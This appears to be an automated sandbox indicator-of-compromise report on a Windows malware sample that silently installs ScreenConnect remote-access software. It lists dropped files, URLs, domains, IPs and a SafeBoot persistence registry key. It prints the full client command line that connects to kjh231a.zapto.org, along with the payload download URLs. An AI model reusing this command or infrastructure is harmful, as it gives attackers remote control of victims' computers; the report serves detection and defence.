IOC Report
khwHsyfsJ1.exe

loading gif

Files

File Path
Type
Category
Malicious
khwHsyfsJ1.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_khwHsyfsJ1.exe_cedc721fedcefff4fd769557be0c6a9fb641d7_026cf9bc_01bbeda8-9df9-431d-b05b-aa7134e7ccfd\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x867a2d70, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F87.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER216C.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER21AC.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER21B9.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2208.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
modified
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\1co5soej.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\62C6HAPT.log
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\ATCJGV5C.AJP\B8PVKCMA.Z7R.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 68 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\khwHsyfsJ1.exe
"C:\Users\user\Desktop\khwHsyfsJ1.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=41bb451f-21e9-4165-b8b1-29146c1a400a&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "22550ff7-91dc-46b5-a75f-0870a9ece610" "User"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 652 -ip 652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 844
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://secure.stansup.com/Bin/ScreenConnect.Client.application9
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationD
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsCli
unknown
https://secure.stansup.com/Bin
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
79.110.49.185
https://login.microsoftonline.com/ppsecure/ResolveUser.srf
unknown
https://secure.stansup.com
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application1
unknown
https://secure.stansup.c
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdence
unknown
https://secure.staP2
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationY
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exea
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200
unknown
http://Passport.NET/tb_
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdd
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configdZ
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdema#1
unknown
http://www.w3.(
unknown
https://secure.stansa
unknown
https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
79.110.49.185
https://account.live.com/msangcwam
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
79.110.49.185
http://www.w3.or
unknown
http://crl.ver)
unknown
http://passport.net/tb
unknown
https://secure.staP
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
unknown
https://secure.stansup.com/B
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windo
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAA
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:p
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifestU
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.exeO
unknown
https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
79.110.49.185
http://schemas.xmlsoap.org/ws/2005/02/scon
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
http://crl3.digice
unknown
https://login.ecur
unknown
https://account.live.com/Wizard/Password/Change?id=806013
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifestn1CD
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhema
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.dll
79.110.49.185
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
unknown
https://secure.stansup.com/Bin/ScreeTX
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:S
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust
unknown
https://login.microsoftonline.com/MSARST2.srf
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll#
unknown
http://Passport.NET/STS
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpC9fPITA
unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
unknown
https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABGI2aS3a
unknown
http://www.w3.o
unknown
https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
79.110.49.185
https://secure.stansup.com/Bin/ScreenConnect.Client.application#Scre0
unknown
http://Passport.NET/tb
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
unknown
https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
79.110.49.185
http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
unknown
https://signup.live.com/signup.aspx
unknown
https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecu-1.0
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80603
unknown
http://schemas.xmlsoap.org/ws/2004/09/policy
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
unknown
https://secure.stansup.com/Bin/ScreenConnect.Core.dll
79.110.49.185
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
unknown
http://www.xrml.org/schema/2001/11/xrml2core
unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
secure.stansup.com
79.110.49.185
kjh231a.zapto.org
79.110.49.185
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
84.201.210.34
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
79.110.49.185
secure.stansup.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (41bb451f-21e9-4165-b8b1-29146c1a400a)
NULL
 malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
